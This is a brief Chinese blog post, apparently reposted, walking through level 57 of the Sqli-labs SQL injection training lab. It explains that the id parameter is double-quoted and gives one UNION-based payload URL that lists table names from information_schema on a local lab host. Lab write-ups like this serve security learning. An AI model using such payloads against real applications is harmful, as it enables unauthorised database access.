您的位置:首页 > 数据库

Sqli-labs less 57

2016-08-11 21:26 357 查看

Less-57



从代码中看到对id进行了 " " 的处理,所以此处我们构造的payload要进行 "" 的处理,示例payload:
http://127.0.0.1/sqli-labs/Less-57/index.php?id=-1"union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'%23

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: